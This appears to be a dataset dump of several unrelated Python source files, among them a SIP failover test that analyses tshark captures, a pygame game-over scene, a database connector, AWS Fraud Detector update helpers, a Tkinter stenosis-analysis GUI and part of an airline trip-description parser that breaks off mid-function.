sip_transport == 'UDP':\n self.check_sip_reg_dst(msgs[0], self.simproxy6)\n else:\n tcp_connection1 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6, self.simproxy6, '1')\n tcp_connection1_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6, self.simproxy6, '2')\n\n if self.ip_mode == 'Dual Mode':\n log.info(\"IPv6 preference, Dual mode\")\n if sip_transport == 'UDP':\n self.check_sip_reg_dst(\n msgs[self.index_2nd_reg], self.simproxy)\n else:\n tcp_connection2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr,\n self.simproxy, '1')\n tcp_connection2_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr,\n self.simproxy, '2')\n else:\n log.info(\"IPv4, first reg send to simproxy\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n self.check_sip_reg_dst(\n msgs[self.index_200-1], self.secondary_proxy)\n else:\n self.frame_number = self.get_frame_number_tls(\n self.phone_ipaddr, self.simproxy2nd)\n if sip_transport == 'UDP':\n self.check_sip_reg_dst(msgs[0], self.simproxy)\n else:\n tcp_connection1 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '1')\n tcp_connection1_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '2')\n\n if self.ip_mode == 'Dual Mode':\n log.info(\"IPv4 preference, Dual mode\")\n if sip_transport == 'UDP':\n self.check_sip_reg_dst(\n msgs[self.index_2nd_reg], self.simproxy6)\n else:\n tcp_connection2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6,\n self.simproxy6, '1')\n tcp_connection2_2 = self.get_tcp_connection(\n self.frame_number, 
self.phone_ipaddr6,\n self.simproxy6, '2')\n\n # check the fallback time between the 1st register and time registered\n if sip_transport == 'TCP':\n self.check_fallback_time(\n tcp_connection1[0], tcp_connection1_2[0],\n msgs[self.index_200 + 1], self.sip_transport)\n elif sip_transport == 'TLS':\n self.check_fallback_time(\n tcp_connection1[0], tcp_connection1_2[0],\n self.msg_reg_ok[1], self.sip_transport)\n else:\n self.check_fallback_time(\n msgs[0], msgs[self.index_200], msgs[self.index_200+1],\n self.sip_transport)\n log.info(\"Analyse tshark packet is done\")\n\n # analyse the sniffer for non-register sip messages\n def analyse_tshark_capture_other(self, sip_transport):\n log.info(\"Start to analyse tshark packet\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n if self.sub_type == 'blf':\n packets = self.tshark.omd_read(\n self.capture_file,\n filter='(sip)&&!(sip.Method==\"ACK\")&&' +\n '!(sip.Status-Code == 481)&&' +\n '!(sip.Subscription-State == \"terminated\")',\n other_args=self.ignore_tcp_seq)\n else:\n packets = self.tshark.omd_read(\n self.capture_file, filter='(sip)&&!(sip.Method==\"ACK\")',\n other_args=self.ignore_tcp_seq)\n log.info(\"expected msgs are {}\".format(self.expect_msg))\n msgs = self.tshark.omd_check_sip_msgs(packets, self.expect_msg)\n self.assertTrue(msgs)\n if self.sip_method == 're-invite-hold':\n expect_packets = self.tshark.omd_read(\n self.capture_file,\n filter='(sip)&&(sdp.media_attr==\"sendonly\")&&' +\n '(sip.resend==0)',\n other_args=self.ignore_tcp_seq)\n else:\n expect_packets = self.tshark.omd_read(\n self.capture_file, filter=(\n '(sip.Method==\"{}\")&&(sip.resend==0)'.format(\n self.sip_method.upper())),\n other_args=self.ignore_tcp_seq)\n reg_packets = self.tshark.omd_read(\n self.capture_file,\n filter='(sip.Method==\"REGISTER\")&&(sip.resend==0)',\n other_args=self.ignore_tcp_seq)\n if self.sip_method == 'subscribe':\n index = len(self.expect_msg) - 1 - self.expect_msg[::-1].index(\n 'notify')\n else:\n index = len(self.expect_msg) - 1 - self.expect_msg[::-1].index(\n 'bye')\n self.frame_number = self.tshark.omd_get_attr(\n packets[index], \"frame.number\")[0]\n # for IPv4, the first registration destination is simproxy\n if self.sip_preference == 'IPv6':\n log.info(\"IPv6, first reg send to simproxy6\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n self.check_sip_reg_dst(expect_packets[0], self.simproxy6)\n self.check_sip_reg_dst(reg_packets[0], self.simproxy6)\n self.check_sip_reg_dst(expect_packets[1], self.simproxy)\n if self.auto_register == '1' or sip_transport == 'TCP':\n self.check_sip_reg_dst(reg_packets[1], self.simproxy)\n self.check_sip_reg_dst(\n expect_packets[2], self.secondary_proxy6)\n if self.auto_register == '1' or sip_transport == 'TCP':\n self.check_sip_reg_dst(\n reg_packets[2], self.secondary_proxy6)\n if self.use_dns_srv == '1' and sip_transport == 'UDP' and (\n self.auto_register == '1'):\n self.check_sip_reg_dst(\n msgs[index + 2], self.simproxy6)\n if self.sip_method == 'subscribe' and (\n self.auto_register == '1' and self.try_backup_rsc):\n self.check_sip_reg_dst(\n msgs[index + 4], self.simproxy6)\n else:\n self.frame_number = self.get_frame_number_tls(\n self.phone_ipaddr6, self.simproxy2nd6)\n if sip_transport.upper() in ['TLS', 'TCP']:\n log.info(\"tls or tcp connection check\")\n tcp_connection1 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6, self.simproxy6, '1')\n tcp_connection1_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6, self.simproxy6, '2')\n 
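# editorial note: per get_tcp_connection above, tcp_connection1 holds the SYN (or FIN for non-register\n # methods) towards the primary proxy before fallback and tcp_connection1_2 holds the SYN of the\n # re-established connection afterwards; that pair feeds check_fallback_time at the end of this method.\n 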
tcp_connection2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '1')\n tcp_connection2_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '2')\n log.info(\"tls or tcp connection check done\")\n\n else:\n log.info(\"IPv4, first reg send to simproxy\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n self.check_sip_reg_dst(reg_packets[0], self.simproxy)\n self.check_sip_reg_dst(expect_packets[0], self.simproxy)\n if self.ip_mode == 'IPv4 Only':\n self.check_sip_reg_dst(\n expect_packets[1], self.secondary_proxy)\n if self.auto_register == '1' or sip_transport == 'TCP':\n self.check_sip_reg_dst(\n reg_packets[1], self.secondary_proxy)\n else:\n self.check_sip_reg_dst(\n expect_packets[2], self.secondary_proxy)\n if self.auto_register == '1' or sip_transport == 'TCP':\n self.check_sip_reg_dst(\n reg_packets[2], self.secondary_proxy)\n if self.use_dns_srv == '1' and sip_transport == 'UDP' and (\n self.auto_register == '1'):\n self.check_sip_reg_dst(\n msgs[index + 2], self.simproxy)\n if self.sip_method == 'subscribe' and (\n self.auto_register == '1' and self.try_backup_rsc):\n self.check_sip_reg_dst(\n msgs[index + 4], self.simproxy)\n else:\n self.frame_number = self.get_frame_number_tls(\n self.phone_ipaddr, self.simproxy2nd)\n if sip_transport.upper() in ['TLS', 'TCP']:\n log.info(\"tls or tcp connection check\")\n tcp_connection1 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '1')\n tcp_connection1_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '2')\n\n if self.ip_mode == 'Dual Mode':\n log.info(\"IPv4 preference, Dual mode\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n self.check_sip_reg_dst(expect_packets[1], self.simproxy6)\n if self.auto_register == '1' or sip_transport == 'TCP':\n self.check_sip_reg_dst(reg_packets[1], self.simproxy6)\n if sip_transport.upper() in ['TLS', 'TCP']:\n log.info(\"tls or tcp connection check\")\n tcp_connection2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6,\n self.simproxy6, '1')\n tcp_connection2_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6,\n self.simproxy6, '2')\n log.info(\"tls or tcp connection check done\")\n\n # check the fallback time\n if sip_transport == 'TCP':\n self.check_fallback_time(\n tcp_connection1[0], tcp_connection1_2[0],\n msgs[index + 2], sip_transport)\n elif sip_transport == 'TLS':\n self.check_fallback_time(\n tcp_connection1[0], tcp_connection1_2[0],\n self.msg_reg_ok[-1], sip_transport)\n log.info(\"Analyse tshark packet is done\")\n","sub_path":"common/Signaling/cmSG_3pcc_failover_fallback_base.py","file_name":"cmSG_3pcc_failover_fallback_base.py","file_ext":"py","file_size_in_byte":43967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"312882705","text":"import pygame\nfrom Scenes.Scene import Scene\nfrom Shared import *\nfrom Highscore import *\n\nclass GameOverScene(Scene):\n\n\tdef __init__(self, game):\n\t\tsuper(GameOverScene, self).__init__(game)\n\n\t\tself.__playerName = \"\"\n\t\tself.__highscoreSprite = pygame.image.load(GameConstants.SPRITE_HIGHSCORE)\n\n\tdef render(self):\n\n\t\tself.getGame().screen.blit(self.__highscoreSprite, (10, 10))\n\n\t\tself.clearText()\n\t\tself.addText(\"Your name: \", 300, 200, size=30)\n\t\tself.addText(self.__playerName, 420, 200, size=30)\n\t\tsuper(GameOverScene, self).render()\n\n\tdef handleEvents(self, events):\n\t\tsuper(GameOverScene, 
self).handleEvents(events)\n\n\t\tfor event in events:\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\texit()\n\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_RETURN:\n\t\t\t\t\tgame = self.getGame()\n\t\t\t\t\tHighscore().add(self.__playerName, game.getScore())\n\t\t\t\t\tgame.reset()\n\t\t\t\t\tgame.changeScene(GameConstants.HIGHSCORE_SCENE)\n\t\t\t\telif event.key >= 65 and event.key <= 122:\n\t\t\t\t\tself.__playerName += chr(event.key)\n\t\t\t\tif event.key == pygame.K_F1:\n\t\t\t\t\tself.getGame().reset()\n\t\t\t\t\tself.getGame().changeScene(GameConstants.PLAYING_SCENE)","sub_path":"Pygame4/Course_Project/Game/Scenes/GameOverScene.py","file_name":"GameOverScene.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"459146947","text":"\"\"\"\n Core operations of Judi\n\n Usage:\n > import judi\n > judi.connect()\n True\n > judi.search('5134412')\n ('5134412', 'Trademark', 'AWESOME TRADEMARK', 'China', 'CHN', 'Super Awesome Agent', '1111')\n\"\"\"\n\nimport logging\nimport sqlite3\nimport pyodbc\nfrom src.resources.constant import (CONNECTION_STR_SQLITE,\n DB_APP,\n DB_DATABASE,\n DB_DRIVER,\n DB_SERVER,\n DB_PASSWORD,\n DB_USERNAME,\n GIPM_RECORD,\n SEARCH_SQL_FILE,\n LOGGER)\n\nCURSOR = None\nLOGGER = logging.getLogger(__name__)\n\n\ndef live_connection():\n \"\"\" Connecting to GIPM. \"\"\"\n\n global CURSOR\n LOGGER.info('Connecting to GIPM...')\n conn = pyodbc.connect(driver=DB_DRIVER,\n server=DB_SERVER,\n database=DB_DATABASE,\n uid=DB_USERNAME,\n pwd=DB_PASSWORD,\n app=DB_APP)\n CURSOR = conn.cursor()\n LOGGER.info('You are now connected to GIPM')\n return True\n\n\ndef dev_connection():\n \"\"\" Connecting to SQLite. For development only.\n\n return -> bool\n \"\"\"\n\n global CURSOR\n LOGGER.info('Connecting to SQLite...')\n conn = sqlite3.connect(CONNECTION_STR_SQLITE)\n LOGGER.info('Good! You are now connected to SQLite')\n CURSOR = conn.cursor()\n return True\n\n\ndef connect():\n \"\"\" Establish server/database connection.\n\n return -> bool\n \"\"\"\n\n try:\n #return live_connection()\n return dev_connection()\n except pyodbc.OperationalError as e:\n LOGGER.error(f'Connection failed. Try again. {e} -> Type: {type(e)}')\n return False\n\n\ndef search(grn):\n \"\"\" Search record in GIPM using the given GRN.\n\n return -> namedtuple\n \"\"\"\n\n grn = (grn,)\n CURSOR.execute(SEARCH_SQL_FILE, grn)\n results = CURSOR.fetchall()\n\n if len(results) >= 2:\n record = GIPM_RECORD._make(results[0])\n return record._replace(trademark='MULTIPLE MARKS')\n elif len(results) == 1:\n return GIPM_RECORD._make(results[0])\n else:\n return None\n\n\ndef disconnect():\n \"\"\" Disconnect from SQLite. For development only. 
\"\"\"\n\n CURSOR.close()\n","sub_path":"src/core/judi.py","file_name":"judi.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"42928313","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename\nfrom classification import VideoAnalyzer\nfrom segmentation import Segmentor\nfrom modules.sten_measure import Sten_Measure\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass main_view():\n\tdef __init__(self):\n\t\tself.analyzer = VideoAnalyzer()\n\t\tself.segmentor = Segmentor()\n\t\tself.measure = Sten_Measure()\n\t\tself.video = ''\n\t\tself.classification_results = plt.figure()\n\t\tself.segmentation_results = plt.figure()\n\t\tself.frames_array = np.empty((0,512,512,1))\n\t\tself.frames_array = np.empty((0,512,512,1))\n\t\tself.stenosis = 0\n\t\tself.stenosis_loc = ''\n\t\tself.root = Tk()\n\t\tself.root.title('Integrated Stenosis Measurement Toolkit')\n\t\t# self.root.geometry('1920*1680')\n\t\tself.load_button = Button(self.root, text = 'load video', command = self.load, height = 200, width = 100)\n\t\tself.load_button.pack()\n\n\t\tself.analyze_button = Button(self.root, text = 'analyze', command = self.analyze)\n\t\tself.analyze_button.pack()\n\n\n\t\tself.root.mainloop()\n\n\tdef load(self):\n\t\tself.video = askopenfilename(\n\t\t\tinitialdir = \"/\",title = \"Select file\",filetypes = ((\"video files\",\"*.mp4\"),(\"all files\",\"*.*\")))\n\t\tmsg = Message(self.root, text = 'video loaded')\n\t\tmsg.pack()\n\n\tdef analyze(self):\n\t\tself.classification_results,self.frames_array = self.analyzer.analyze(self.video)\n\t\tself.segmentation_results,self.masks_array = self.segmentor.analyze(self.frames_array)\n\t\tself.masks_array = np.array(self.masks_array, dtype=np.uint8)\n\t\tself.stenosis, self.stenosis_loc = self.measure.analyze(self.masks_array)\n\t\t\n\t\t\n\t\tmsg = Message(self.root, text = 'done analyzing')\n\t\tmsg.pack()\n\t\t\n\t\tself.show_class_button = Button(self.root, text = 'key frames', command = self.show_classification)\n\t\tself.show_class_button.pack()\n\n\t\tself.show_segment_button = Button(self.root, text = 'vessel segmentation',command = self.show_segmentation)\n\t\tself.show_segment_button.pack()\n\t\t\n\t\tself.show_segment_button = Button(self.root, text = 'stenosis measurement',command = self.show_measurement)\n\t\tself.show_segment_button.pack()\n\n\tdef show_classification(self):\n\t\tself.classification_results.show()\n\n\tdef show_segmentation(self):\n\t\tself.segmentation_results.show()\n\n\tdef show_measurement(self):\n\t\tmsg1 = Message(self.root, text = self.stenosis)\n\t\tmsg2 = Message(self.root, text = self.stenosis_loc)\n\t\tmsg1.pack()\n\t\tmsg2.pack()\n\nview = main_view()","sub_path":"interface/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"359463151","text":"#!/usr/bin/env checkio --domain=py run even-last\n\n# https://py.checkio.org/mission/even-last/\n\n# You are given an array of integers. You should find the sum of the elements with even indexes (0th, 2nd, 4th...) then multiply this summed number and the final element of the array together. 
Don't forget that the first element has an index of 0.\n# \n# For an empty array, the result will always be 0 (zero).\n# \n# Input:A list of integers.\n# \n# Output:The number as an integer.\n# \n# Precondition:0 ≤ len(array) ≤ 20\n# all(isinstance(x, int) for x in array)\n# all(-100 < x < 100 for x in array)\n# \n# \n# \n# END_DESC\n\ndef checkio(array):\n if array:\n s = 0\n for i in range(len(array)):\n if i%2 == 0:\n s+=array[i]\n return s*array[i]\n else:\n return 0\nprint (checkio([5,8,4]))","sub_path":"Elementary/even_last.py","file_name":"even_last.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"440835630","text":"def solve(K,C,S):\r\n res = set()\r\n if K == S:\r\n for i in range(1,K+1):\r\n res.add(i)\r\n if len(res) > S:\r\n return (\"IMPOSSIBLE\")\r\n else :\r\n return ' '.join(map(str, res))\r\n\r\nif __name__ == \"__main__\":\r\n T = int(input())\r\n \r\n for caseNr in range(T):\r\n K,C,S = map(int, input().split())\r\n print(\"Case #%i: %s\" % (caseNr+1, solve(K,C,S)))","sub_path":"codes/CodeJamCrawler/16_0_4_neat/16_0_4_kazuyoshi_hayase_Dsmall.py","file_name":"16_0_4_kazuyoshi_hayase_Dsmall.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"140094660","text":"import logging\nfrom cloudformation_cli_python_lib import (\n exceptions,\n)\n\nfrom . import validation_helpers, api_helpers, common_helpers, util\nfrom ..models import ResourceModel\n\n# Use this logger to forward log messages to CloudWatch Logs.\nLOG = logging.getLogger(__name__)\nLOG.setLevel(logging.DEBUG)\n\n\ndef validate_dependencies_for_update(afd_client, model: ResourceModel, previous_model: ResourceModel):\n # TODO: revisit this validation when/if we support in-place teardown\n # is_teardown_required = _determine_if_teardown_is_required(afd_client, model, previous_model)\n # if is_teardown_required and not model.AllowTeardown:\n # raise RuntimeError(TEARDOWN_CONFLICT_MESSAGE)\n _validate_event_variables_for_update(afd_client, model, previous_model)\n _validate_entity_types_for_update(afd_client, model, previous_model)\n _validate_labels_for_update(afd_client, model, previous_model)\n\n\ndef _validate_event_variables_for_update(afd_client, model: ResourceModel, previous_model: ResourceModel):\n previous_variables = {variable.Name: variable for variable in previous_model.EventVariables}\n new_event_variable_names = set()\n for event_variable in model.EventVariables:\n _validate_event_variable_for_update(afd_client, event_variable, previous_variables)\n new_event_variable_names.add(event_variable.Name)\n\n # remove previous inline variables that are no longer in the event type\n for previous_variable_name, previous_variable in previous_variables.items():\n if previous_variable_name not in new_event_variable_names and previous_variable.Inline:\n api_helpers.call_delete_variable(frauddetector_client=afd_client, variable_name=previous_variable_name)\n\n\ndef _validate_event_variable_for_update(afd_client, event_variable, previous_variables):\n if event_variable.Inline:\n _validate_inline_event_variable_for_update(afd_client, event_variable, previous_variables)\n else:\n _validate_referenced_event_variable_for_update(afd_client, event_variable)\n\n\ndef _validate_referenced_event_variable_for_update(afd_client, event_variable):\n event_variable_name = util.extract_name_from_arn(event_variable.Arn)\n 
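# editorial note (assumption): util.extract_name_from_arn is defined elsewhere; it presumably returns the\n # trailing resource name, roughly arn.split('/')[-1], e.g. '...:variable/ip_address' -> 'ip_address'.\n 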
get_variables_worked, _ = validation_helpers.check_if_get_variables_succeeds(afd_client, event_variable_name)\n if not get_variables_worked:\n raise exceptions.NotFound(\"event_variable\", event_variable.Arn)\n\n\ndef _validate_inline_event_variable_for_update(afd_client, event_variable, previous_variables):\n if not event_variable.Name:\n raise exceptions.InvalidRequest(\"Error occurred: inline event variables must include Name!\")\n\n # TODO: update this logic if we support in-place Teardown\n # This difference would require teardown if we were to support it\n\n # check for differences in dataSource or dataType\n differences = {}\n previous_variable = previous_variables.get(event_variable.Name, None)\n if previous_variable:\n differences = validation_helpers.check_variable_differences(previous_variable, event_variable)\n if differences[\"dataSource\"] or differences[\"dataType\"]:\n raise exceptions.InvalidRequest(\"Error occurred: cannot update event variable data source or data type!\")\n\n if not previous_variable:\n # create inline variable that does not already exist\n common_helpers.create_inline_event_variable(frauddetector_client=afd_client, event_variable=event_variable)\n else:\n # get existing variable to get arn. Arn is readonly property, so it will not be attached to input model\n (\n get_variables_worked,\n get_variables_response,\n ) = validation_helpers.check_if_get_variables_succeeds(afd_client, event_variable.Name)\n if not get_variables_worked:\n raise RuntimeError(f\"Previously existing event variable {event_variable.Name} no longer exists!\")\n event_variable.Arn = get_variables_response.get(\"variables\")[0].get(\"arn\")\n # update existing inline variable\n if hasattr(event_variable, \"Tags\"):\n common_helpers.update_tags(\n frauddetector_client=afd_client,\n afd_resource_arn=event_variable.Arn,\n new_tags=event_variable.Tags,\n )\n var_type = [None, event_variable.VariableType][event_variable.VariableType != previous_variable.VariableType]\n api_helpers.call_update_variable(\n variable_name=event_variable.Name,\n frauddetector_client=afd_client,\n variable_default_value=event_variable.DefaultValue,\n variable_description=event_variable.Description,\n variable_type=var_type,\n )\n\n\ndef _validate_entity_types_for_update(afd_client, model: ResourceModel, previous_model: ResourceModel):\n previous_entity_types = {entity_type.Name: entity_type for entity_type in previous_model.EntityTypes}\n new_entity_type_names = set()\n for entity_type in model.EntityTypes:\n _validate_entity_type_for_update(afd_client, entity_type, previous_entity_types)\n new_entity_type_names.add(entity_type.Name)\n\n # remove previous inline entity types that are no longer in the event type\n for (\n previous_entity_type_name,\n previous_entity_type,\n ) in previous_entity_types.items():\n if previous_entity_type_name not in new_entity_type_names and previous_entity_type.Inline:\n api_helpers.call_delete_entity_type(\n frauddetector_client=afd_client,\n entity_type_name=previous_entity_type_name,\n )\n\n\ndef _validate_entity_type_for_update(afd_client, entity_type, previous_entity_types):\n if entity_type.Inline:\n _validate_inline_entity_type_for_update(afd_client, entity_type, previous_entity_types)\n else:\n _validate_referenced_entity_type_for_update(afd_client, entity_type)\n\n\ndef _validate_referenced_entity_type_for_update(afd_client, entity_type):\n entity_type_name = util.extract_name_from_arn(entity_type.Arn)\n get_entity_types_worked, _ = 
validation_helpers.check_if_get_entity_types_succeeds(afd_client, entity_type_name)\n if not get_entity_types_worked:\n raise exceptions.NotFound(\"entity_type\", entity_type.Arn)\n\n\ndef _validate_inline_entity_type_for_update(afd_client, entity_type, previous_entity_types):\n if entity_type.Name is None:\n raise exceptions.InvalidRequest(\"Error occurred: inline entity types must include Name!\")\n\n previous_entity_type = previous_entity_types.get(entity_type.Name, None)\n if not previous_entity_type:\n # put inline entity type that does not already exist\n common_helpers.put_inline_entity_type(frauddetector_client=afd_client, entity_type=entity_type)\n else:\n # get existing entity type to get arn. Arn is readonly property, so it will not be attached to input model\n (\n get_entity_types_worked,\n get_entity_types_response,\n ) = validation_helpers.check_if_get_entity_types_succeeds(afd_client, entity_type.Name)\n if not get_entity_types_worked:\n raise RuntimeError(f\"Previously existing entity type {entity_type.Name} no longer exists!\")\n entity_type.Arn = get_entity_types_response.get(\"entityTypes\")[0].get(\"arn\")\n # put existing inline entity type and update tags\n common_helpers.put_inline_entity_type(frauddetector_client=afd_client, entity_type=entity_type)\n if hasattr(entity_type, \"Tags\"):\n common_helpers.update_tags(\n frauddetector_client=afd_client,\n afd_resource_arn=entity_type.Arn,\n new_tags=entity_type.Tags,\n )\n\n\ndef _validate_labels_for_update(afd_client, model: ResourceModel, previous_model: ResourceModel):\n previous_labels = {label.Name: label for label in previous_model.Labels}\n new_label_names = set()\n for label in model.Labels:\n _validate_label_for_update(afd_client, label, previous_labels)\n new_label_names.add(label.Name)\n\n # remove previous inline labels that are no longer in the event type\n for previous_label_name, previous_label in previous_labels.items():\n if previous_label_name not in new_label_names and previous_label.Inline:\n api_helpers.call_delete_label(frauddetector_client=afd_client, label_name=previous_label_name)\n\n\ndef _validate_label_for_update(afd_client, label, previous_labels):\n if label.Inline:\n _validate_inline_label_for_update(afd_client, label, previous_labels)\n else:\n _validate_referenced_label_for_update(afd_client, label)\n\n\ndef _validate_referenced_label_for_update(afd_client, label):\n label_name = util.extract_name_from_arn(label.Arn)\n get_labels_worked, _ = validation_helpers.check_if_get_labels_succeeds(afd_client, label_name)\n if not get_labels_worked:\n raise exceptions.NotFound(\"label\", label.Arn)\n\n\ndef _validate_inline_label_for_update(afd_client, label, previous_labels):\n if label.Name is None:\n raise exceptions.InvalidRequest(\"Error occurred: inline labels must include Name!\")\n\n previous_label = previous_labels.get(label.Name, None)\n if not previous_label:\n # put inline label that does not already exist\n common_helpers.put_inline_label(frauddetector_client=afd_client, label=label)\n else:\n # get existing label to get arn. 
Arn is readonly property, so it will not be attached to input model\n (\n get_labels_worked,\n get_labels_response,\n ) = validation_helpers.check_if_get_labels_succeeds(afd_client, label.Name)\n if not get_labels_worked:\n raise RuntimeError(f\"Previously existing label {label.Name} no longer exists!\")\n label.Arn = get_labels_response.get(\"labels\")[0].get(\"arn\")\n # put existing inline label and update tags\n common_helpers.put_inline_label(frauddetector_client=afd_client, label=label)\n if hasattr(label, \"Tags\"):\n common_helpers.update_tags(\n frauddetector_client=afd_client,\n afd_resource_arn=label.Arn,\n new_tags=label.Tags,\n )\n","sub_path":"aws-frauddetector-eventtype/src/aws_frauddetector_eventtype/helpers/update_worker_helpers.py","file_name":"update_worker_helpers.py","file_ext":"py","file_size_in_byte":10155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"293847222","text":"import sys, os, re, copy\n# from PyQt5.QtWidgets import QApplication, QListView, QWidget, QPushButton, QToolTip, QMainWindow, QDesktopWidget, QAction, qApp, QToolBar, QFileDialog, QTextEdit, QTabWidget, QDockWidget, QVBoxLayout, QAbstractItemView\n# from PyQt5.QtGui import QIcon, QStandardItemModel, QStandardItem, QColor\n# from PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom operator import itemgetter, attrgetter\n\n\ndef str2time(timeString):\n \"\"\"\n This function converts a time duration string in the supplied format (string, e.g. '%H%M' to a timedelta object\n\n Args:\n timeString: a time duration string\n strings in the format HHHMM HHMM or HMM and Colon delimited versions i.e. 
HHH:MM HH:MM or H:MM\n\n Returns:\n a timedelta object\n\n Raises:\n TBA\n \"\"\"\n if ':' not in timeString:\n\n if len(timeString) == 5:\n elapsedTimeSplit = [int(timeString[0:3]), int(timeString[3:5])]\n elif len(timeString) == 4:\n elapsedTimeSplit = [int(timeString[0:2]), int(timeString[2:4])]\n else:\n elapsedTimeSplit = [int(timeString[0]), int(timeString[1:3])]\n else:\n if len(timeString) == 6:\n elapsedTimeSplit = [int(timeString[0:3]), int(timeString[4:6])]\n elif len(timeString) == 5:\n elapsedTimeSplit = [int(timeString[0:2]), int(timeString[3:5])]\n else:\n elapsedTimeSplit = [int(timeString[0]), int(timeString[2:4])]\n\n t = timedelta(hours=elapsedTimeSplit[0], minutes=elapsedTimeSplit[1])\n return t\n\n\nclass trip(object):\n \"\"\"\n This class defines a trip object\n\n Args:\n tripData = A list of lists representing the header data for the trip:\n 1: Trip Num (integer)\n 2: Trip Num Prev (integer)\n 3: Credit Hours (timedelta object)\n 4: Fl Hours (timedelta object)\n 5: Ldgs (integer)\n 6: Pos hrs (timedelta object)\n 7: Crew (string)\n 8: TAFB (timedelta object)\n 9: Trip Len (integer)\n # 10: regularity (list of datetimes)\n 10: Report Date (date object)\n 11: Report Time (time object)\n 12: Notes (string)\n The first list is a list of strings defining the header titles\n\n\n sectData = A list of lists representing the header data for the trip:\n 1: Day (integer)\n 2: Flt Number (string)\n 3: A/C Type (string)\n 4: Dept Station (String)\n 5: Dept Time (datetime object)\n 6: Arr Station (string)\n 7: Arr Time (datetime object)\n 8: Fl Hours (timedelta object)\n 9: Meal (string)\n The first list is a list of strings defining the header titles\n\n\n sectTotData\n 1: Slip (Boolean)\n 2: Slip Destination (string)\n 3: Slip Time (timedelta object)\n 4: Tot Fl Hours (timedelta)\n 5: Duty Period (timedelta object)\n 6: Credit Hours (timedelta object)\n The first list is a list of strings defining the header titles\n\n\n Returns:\n\n Raises:\n TBA\n\n \"\"\"\n\n def __init__(self, tripData, sectData, sectTotData):\n self.tripNum = tripData[1][0]\n self.tripNumPrev = tripData[1][1]\n self.crHrs = tripData[1][2]\n self.flHrs = tripData[1][3]\n self.ldgs = tripData[1][4]\n self.pos = tripData[1][5]\n self.crew = tripData[1][6]\n self.TAFB = tripData[1][7]\n self.tripLen = tripData[1][8]\n # self.regularity = tripData[1][9]\n self.reportDate = tripData[1][9]\n self.reportTime = tripData[1][10]\n self.notes = tripData[1][11]\n self.sectData = sectData\n self.sectTotData = sectTotData\n\n # data[0][1],data[0][1],data[0][2],data[0][3],data[0][4],data[0][5],data[0][6],data[0][7],data[0][8],data[0][9],data[0][10],data[0][11]\n\n\n# def __str__ (self):\n# return '<'+str(self.length)+','+self.dest+','+self.startDate+','+self.reportTime+'>'\n\n# def get_length(self):\n# return self.length\n\n# def get_dest(self):\n# return self.dest\n# def get_startDate(self):\n# return self.startDate\n# def get_reportTime(self):\n# return self.reportTime\n# def set_length(self,length):\n# self.length=length\n# def set_dest(self,dest):\n# self.dest=dest\n# def set_startDate(self,startDate):\n# self.startDate=startDate\n# def set_reportTime(self,reportTime):\n# self.reportTime=reportTime\n\ndef createFltRegularity(regularityRaw):\n \"\"\"\n Creates a list of dates when the flight operates\n\n Args:\n regularityRaw: a list of lists contain the raw strings extracted from the trip desccriptions text file\n\n Returns:\n regularity: a list of datetime objects of when the flight operates\n\n Raises:\n TBA\n\n 
@author: Ed\n \"\"\"\n regularity = [] # initialise a list with 0 elements\n for rows in regularityRaw:\n startDate = datetime.date(datetime.strptime(rows[0], '%d%b%y')) # convert startDate to a date object\n if rows[0] == rows[1]:\n # there is a single date which the flight operates\n regularity.append(startDate)\n else:\n # there is more than 1 date\n daysStr = re.findall('(\\.|[MTWJFSZ])', rows[2])\n\n # calculate start date offset\n offsetFound = False\n el = 0\n while offsetFound == False:\n if daysStr[el] != '.':\n offset = el\n offsetFound = True\n else:\n el += 1\n\n # work through daysStr to see when the flight operates\n for el in daysStr:\n if el != '.': # if it operates on that day\n regularity.append(startDate + timedelta(\n days=daysStr.index(el) - offset)) # calculate date and add to the regularity list\n # update regularity matrix\n\n return regularity\n\n\ndef openTripDescriptionFile(filename):\n # open trip descriptions plain text file\n with open(filename, 'r') as file:\n\n # read the entire file\n # string = file.readlines()\n string = file.read()\n rawText = string\n\n fileEnd = False # initialise fileEnd variable\n startIndex = 0 